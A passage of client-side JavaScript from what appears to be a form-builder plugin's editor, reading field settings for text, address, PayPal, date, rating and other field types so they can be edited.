	}			
	else alert("Please select an element to add.");

}

function call(i,key) {
  need_enable = false;
  if (key==0) {
    edit(i);
    add('1');
  }
  need_enable = true;
}

function edit_page_break(id)
{
		enable2();
		
	document.getElementById('editing_id').value=id;

		form_view_element	=document.getElementById('form_id_tempform_view'+id);
		page_title			=form_view_element.getAttribute('page_title');
		if(form_view_element.getAttribute('next_title'))
		{
			next_title			=form_view_element.getAttribute('next_title');
			next_type			=form_view_element.getAttribute('next_type');
			next_class			=form_view_element.getAttribute('next_class');
			next_checkable		=form_view_element.getAttribute('next_checkable');
			previous_title		=form_view_element.getAttribute('previous_title');
			previous_type		=form_view_element.getAttribute('previous_type');
			previous_class		=form_view_element.getAttribute('previous_class');
			previous_checkable	=form_view_element.getAttribute('previous_checkable');
			w_title	=[ next_title, previous_title];
			w_type	=[next_type,previous_type];
			w_class	=[next_class,previous_class];
			w_check	=[next_checkable,previous_checkable];
		}
		else
		{
			w_title	=[ "Next","Previous"];
			w_type	=["button","button"];
			w_class	=["",""];
			w_check	=['true', 'true'];
		}
		
	
	
	//atrs=return_attributes('form_id_tempform_view'+id);
	w_attr_name=[];
	w_attr_value=[];
	type_page_break(id, page_title , w_title, w_type, w_class, w_check, w_attr_name, w_attr_value);

}

function edit(id) {
  if (need_enable) {
    enable2();
  }
	document.getElementById('editing_id').value=id;
	type=document.getElementById(id).getAttribute('type');
	
	
	//////////////////////////////parameter take
	k=0;
	
	w_choices=new Array();	
	w_choices_checked=new Array();
	w_choices_disabled=new Array();
	w_allow_other_num = 0;
  w_property = new Array();	
	w_property_type = new Array();	
	w_property_values = new Array();
	w_choices_price = new Array();
	t = 0;
	/////////shat handipox
	
	if(document.getElementById(id+'_element_labelform_id_temp').innerHTML)
		w_field_label=document.getElementById(id+'_element_labelform_id_temp').innerHTML;
		
	if(document.getElementById(id+'_label_and_element_sectionform_id_temp'))
		w_field_label_pos="top";
	else
		w_field_label_pos="left";
		
	if(document.getElementById(id+"_elementform_id_temp"))
	{
		s=document.getElementById(id+"_elementform_id_temp").style.width;
		 w_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_requiredform_id_temp"))
	  	w_required=document.getElementById(id+"_requiredform_id_temp").value;
		
	if(document.getElementById(id+"_uniqueform_id_temp"))
	  	w_unique=document.getElementById(id+"_uniqueform_id_temp").value;
		
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	{
		w_class=document.getElementById(id+'_label_sectionform_id_temp').getAttribute("class");
		if(!w_class)
			w_class="";
	}
		

	switch(type)
		{
			case 'type_editor':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				type_editor(id, w_editor); break;
			}
			case 'type_section_break':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				type_section_break(id, w_editor); break;
			}
			case 'type_text':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_text(id, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_number':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_number(id, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_password':
			{
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_password(id, w_field_label, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_textarea':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_textarea(id, w_field_label, w_field_label_pos, w_size, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_phone':
			{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
				s=document.getElementById(id+"_element_lastform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				
				if(document.getElementById(id+"_mini_label_area_code"))
				w_mini_labels= [document.getElementById(id+"_mini_label_area_code").innerHTML, document.getElementById(id+"_mini_label_phone_number").innerHTML];
				else
				w_mini_labels= ['Area Code', 'Phone Number'];
				
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_phone(id, w_field_label, w_field_label_pos, w_size,  w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_name':
			{
				if(document.getElementById(id+'_element_middleform_id_temp'))
					w_name_format="extended";
				else
					w_name_format="normal";
        if (w_name_format == "normal") {
          w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
          w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
        }
        else {
          w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value, document.getElementById(id+"_element_titleform_id_temp").value, document.getElementById(id+"_element_middleform_id_temp").value];
          w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title, document.getElementById(id+"_element_titleform_id_temp").title,
          document.getElementById(id+"_element_middleform_id_temp").title];
        }
        if(document.getElementById(id+"_mini_label_title"))
				w_mini_title = document.getElementById(id+"_mini_label_title").innerHTML;
				else
				w_mini_title = "Title";
				
				
				
				if(document.getElementById(id+"_mini_label_middle"))
				w_mini_middle = document.getElementById(id+"_mini_label_middle").innerHTML;
				else
				w_mini_middle = "Middle";
				
				if(document.getElementById(id+"_mini_label_first"))
				w_mini_first = document.getElementById(id+"_mini_label_first").innerHTML;
				else
				w_mini_first = "First";
				
				if(document.getElementById(id+"_mini_label_last"))
				w_mini_last = document.getElementById(id+"_mini_label_last").innerHTML;
				else
				w_mini_last = "Last";
				
				w_mini_labels = [w_mini_title, w_mini_first,w_mini_last, w_mini_middle];
				
				s=document.getElementById(id+"_element_firstform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_name(id, w_field_label, w_field_label_pos,w_first_val, w_title, w_mini_labels, w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			 case 'type_paypal_price': {
				w_first_val = [document.getElementById(id+"_element_dollarsform_id_temp").value, document.getElementById(id+"_element_centsform_id_temp").value];
				w_title = [document.getElementById(id+"_element_dollarsform_id_temp").title, document.getElementById(id+"_element_centsform_id_temp").title];
				if (document.getElementById(id+"_td_name_cents").style.display=="none") {
					w_hide_cents = 'yes';
        }
				else {
					w_hide_cents = 'no';
        }
				s = document.getElementById(id + "_element_dollarsform_id_temp").style.width;
				w_size=s.substring(0, s.length - 2);
				atrs=return_attributes(id + '_element_dollarsform_id_temp');
				w_attr_name = atrs[0];
				w_attr_value = atrs[1];
				w_range_min = document.getElementById(id+"_range_minform_id_temp").value;
				w_range_max = document.getElementById(id+"_range_maxform_id_temp").value;
        w_mini_labels = [document.getElementById(id+"_mini_label_dollars").innerHTML,document.getElementById(id+"_mini_label_cents").innerHTML];
				type_paypal_price(id, w_field_label, w_field_label_pos, w_first_val, w_title, w_mini_labels, w_size, w_required, w_hide_cents, w_class, w_attr_name, w_attr_value, w_range_min , w_range_max); break;
			}
			case 'type_address':
			{
				s=document.getElementById(id+"_div_address").style.width;
				w_size=s.substring(0,s.length-2);
				
				
			if(document.getElementById(id+"_disable_fieldsform_id_temp"))
			{	
				if(document.getElementById(id+"_mini_label_street1")) {
							w_street1= document.getElementById(id+"_mini_label_street1").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_street1form_id_temp")) {
					w_street1 = document.getElementById(id+"_street1form_id_temp").value;
				  }
				  else {
					w_street1 = '';
				  }
				}
						if (document.getElementById(id+"_mini_label_street2")) {
							w_street2= document.getElementById(id+"_mini_label_street2").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_street2form_id_temp")) {
					w_street2 = document.getElementById(id+"_street2form_id_temp").value;
				  }
				  else {
					w_street2 = '';
				  }
				}
							
						if (document.getElementById(id+"_mini_label_city")) {
							w_city= document.getElementById(id+"_mini_label_city").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_cityform_id_temp")) {
					w_city = document.getElementById(id+"_cityform_id_temp").value;
				  }
				  else {
					w_city = '';
				  }
				}

						if (document.getElementById(id+"_mini_label_state")) {
							w_state= document.getElementById(id+"_mini_label_state").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_stateform_id_temp")) {
					w_state = document.getElementById(id+"_stateform_id_temp").value;
				  }
				  else {
					w_state = '';
				  }
				}
						if (document.getElementById(id+"_mini_label_postal")) {
							w_postal= document.getElementById(id+"_mini_label_postal").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_postalform_id_temp")) {
					w_postal = document.getElementById(id+"_postalform_id_temp").value;
				  }
				  else {
					w_postal = '';
				  }
				}
							
				if (document.getElementById(id+"_mini_label_country")) {
					w_country= document.getElementById(id+"_mini_label_country").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_countryform_id_temp")) {
					w_country = document.getElementById(id+"_countryform_id_temp").value;
				  }
				  else {
					w_country = '';
				  }
				}
				w_mini_labels=[w_street1, w_street2, w_city, w_state, w_postal, w_country];
				var disabled_input = document.getElementById(id+"_disable_fieldsform_id_temp");
				
					w_street1_dis= disabled_input.getAttribute('street1');
					w_street2_dis= disabled_input.getAttribute('street2');
					w_city_dis= disabled_input.getAttribute('city');
					w_state_dis= disabled_input.getAttribute('state');
					w_postal_dis= disabled_input.getAttribute('postal');
					w_country_dis= disabled_input.getAttribute('country');
				
						
				w_disabled_fields=[w_street1_dis, w_street2_dis, w_city_dis, w_state_dis, w_postal_dis, w_country_dis];
			}
			else
			{
				w_mini_labels=['Street Address', 'Street Address Line 2', 'City', 'State / Province / Region', 'Postal / Zip Code', 'Country',];
				w_disabled_fields=['no', 'no', 'no', 'no', 'no', 'no'];	
			}
			
				atrs=return_attributes(id+'_street1form_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_address(id, w_field_label, w_field_label_pos, w_size, w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value);
        disable_fields(id);
        break;
			}



			case 'type_submitter_mail':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				w_send=document.getElementById(id+"_sendform_id_temp").value;
		
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_submitter_mail(id, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_send, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_checkbox': {
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;
		
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
				if(document.getElementById(id+"_rowcol_numform_id_temp") && document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = 1;
				}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_checkbox(id, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value); break;
			}
    
      case 'type_paypal_checkbox': {
				if (document.getElementById(id+'_hor')) {
					w_flow="hor";
        }
				else {
					w_flow = "ver";
        }
				w_randomize = document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other = document.getElementById(id+"_allow_otherform_id_temp").value;
				v = 0;
				for (k = 0; k < 100; k++) {
					if (document.getElementById(id+"_elementform_id_temp" + k)) {
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
					
				}
				
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}
			
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_checkbox(id, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value,  w_property, w_property_type, w_property_values,w_quantity); break;
			}
			case 'type_radio':
			{	
				
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = '';
				}	
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_radio(id, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value); break;
				}
      case 'type_paypal_radio':
			{	
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
				
				}
				
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}
			
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_radio(id, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_property, w_property_type, w_property_values, w_quantity); break;
			}
		
			case 'type_paypal_shipping':
			{	
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
				
				}
				
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_shipping(id, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_property, w_property_type, w_property_values); break;
			}
      case 'type_paypal_total':
			{	
				
				type_paypal_total(id, w_field_label, w_field_label_pos,  w_class); break;
			}
			
			
			case 'type_star_rating':
			{
				w_star_amount  = document.getElementById(id+"_star_amountform_id_temp").value;
				w_field_label_col  = document.getElementById(id+"_star_colorform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_star_rating(id, w_field_label, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_scale_rating':
			{
				w_mini_labels  =[document.getElementById(id+"_mini_label_worst").innerHTML,document.getElementById(id+"_mini_label_best").innerHTML];	
			
				w_scale_amount = document.getElementById(id+"_scale_amountform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_scale_rating(id, w_field_label, w_field_label_pos, w_mini_labels,  w_scale_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_spinner':
			{
				w_field_min_value  = document.getElementById(id+"_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_spinner_widthform_id_temp").value;
				w_field_step = document.getElementById(id+"_stepform_id_temp").value;
				w_field_value  = document.getElementById(id+"_elementform_id_temp").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_spinner(id, w_field_label, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value) ; break;
			
			
			}
			
			case 'type_slider':
			{
				w_field_min_value  = document.getElementById(id+"_slider_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_slider_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_slider_widthform_id_temp").value;
				w_field_value  = document.getElementById(id+"_slider_valueform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_slider(id, w_field_label, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_range':
			{
				
				w_field_range_width  = document.getElementById(id+"_range_widthform_id_temp").value;
				w_field_range_step = document.getElementById(id+"_range_stepform_id_temp").value;
				
				w_field_value1  = document.getElementById(id+"_elementform_id_temp0").getAttribute("aria-valuenow");
				w_field_value2  = document.getElementById(id+"_elementform_id_temp1").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_mini_labels = [document.getElementById(id+"_mini_label_from").innerHTML,document.getElementById(id+"_mini_label_to").innerHTML];
				type_range(id, w_field_label, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) ;  break;
			
			}
			case 'type_grading':
			{
			
				w_total = document.getElementById(id+"_grading_totalform_id_temp").value;
				w_items=[];
				
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k))
					{
						
						w_items.push(document.getElementById(id+"_label_elementform_id_temp"+k).innerHTML);
						
					}
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_grading(id, w_field_label, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) ; refresh_grading_items(id); break;
			
			
			}
			case 'type_matrix':
			{	
                w_rows=[];
				w_rows[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k+"_0"))
					{
						
						w_rows.push(document.getElementById(id+"_label_elementform_id_temp"+k+"_0").innerHTML);
						
					}
			
			    w_columns=[];
				w_columns[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp0_"+k))
					{
						
						w_columns.push(document.getElementById(id+"_label_elementform_id_temp0_"+k).innerHTML);
						
					}
					
			w_field_input_type = document.getElementById(id+"_input_typeform_id_temp").value;		
					
			atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
			type_matrix(id, w_field_label, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value); refresh_matrix(id); break; 
			
			
			}
			case 'type_time':
			{	
				atrs=return_attributes(id+'_hhform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_hh=document.getElementById(id+'_hhform_id_temp').value;
				w_mm=document.getElementById(id+'_mmform_id_temp').value;
				if(document.getElementById(id+'_ssform_id_temp'))
				{
					w_ss=document.getElementById(id+'_ssform_id_temp').value;
					w_sec="1";
				}
				else
				{
					w_ss="";
					w_sec="0";
				}
				if(document.getElementById(id+'_am_pm_select'))
				{
					w_am_pm=document.getElementById(id+'_am_pmform_id_temp').value;
					w_time_type="12";
          w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, document.getElementById(id+'_mini_label_ss').innerHTML, document.getElementById(id+'_mini_label_am_pm').innerHTML];
				}
				else
				{
					w_am_pm=0;
					w_time_type="24";
          w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, document.getElementById(id+'_mini_label_ss').innerHTML,'AM/PM'];
				}
				type_time(id, w_field_label, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_date':
			{	
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_date=document.getElementById(id+'_elementform_id_temp').value;
				w_format=document.getElementById(id+'_buttonform_id_temp').getAttribute("format");
				w_but_val=document.getElementById(id+'_buttonform_id_temp').value;
				type_date(id, w_field_label, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value); break;
			}
			case 'type_date_fields':
			{	
				atrs			=return_attributes(id+'_dayform_id_temp');
				w_attr_name		=atrs[0];
				w_attr_value	=atrs[1];
				w_day			=document.getElementById(id+'_dayform_id_temp').value;
				w_month			=document.getElementById(id+'_monthform_id_temp').value;
				w_year			=document.getElementById(id+'_yearform_id_temp').value;
				w_day_type		=document.getElementById(id+'_dayform_id_temp').tagName;
				w_month_type	=document.getElementById(id+'_monthform_id_temp').tagName;
				w_year_type		=document.getElementById(id+'_yearform_id_temp').tagName;
				w_day_label		=document.getElementById(id+'_day_label').innerHTML;
				w_month_label	=document.getElementById(id+'_month_label').innerHTML;
				w_year_label	=document.getElementById(id+'_year_label').innerHTML;
				
				s				=document.getElementById(id+'_dayform_id_temp').style.width;
				w_day_size		=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_monthform_id_temp').style.width;
				w_month_size	=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_yearform_id_temp').style.width;
				w_year_size		=s.substring(0,s.length-2);
				
				// if (w_year_type=='SELECT') {
        if (document.getElementById(id + '_yearform_id_temp').getAttribute('from') && document.getElementById(id + '_yearform_id_temp').getAttribute('to')) {
					w_from = document.getElementById(id+'_yearform_id_temp').getAttribute('from');
					w_to = document.getElementById(id+'_yearform_id_temp').getAttribute('to');
				}
				else {
					w_from = '1901';
				  var current_date = new Date();
					w_to = current_date.getFullYear();
				}
				w_divider		=document.getElementById(id+'_separator1').innerHTML;
				type_date_fields(id, w_field_label, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value); break;
			}
			case 'type_own_select':
			{	
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_option"+k))
					{
						w_choices[t]=document.getElementById(id+"_option"+k).innerHTML;
						w_choices_checked[t]=document.getElementById(id+"_option"+k).selected;
						if(document.getElementById(id+"_option"+k).value=="")
							w_choices_disabled[t]=true;
						else
							w_choices_disabled[t]=false;
						t++;
					}
					
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_own_select(id, w_field_label, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_class, w_attr_name, w_attr_value, w_choices_disabled); break;
			}
      case 'type_paypal_select':
			{	
				
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_option"+k))
					{
						w_choices[t]=document.getElementById(id+"_option"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_option"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_option"+k).selected;
						if(document.getElementById(id+"_option"+k).value=="")
							w_choices_disabled[t]=true;
						else
							w_choices_disabled[t]=false;
						t++;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
					
				}
				
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
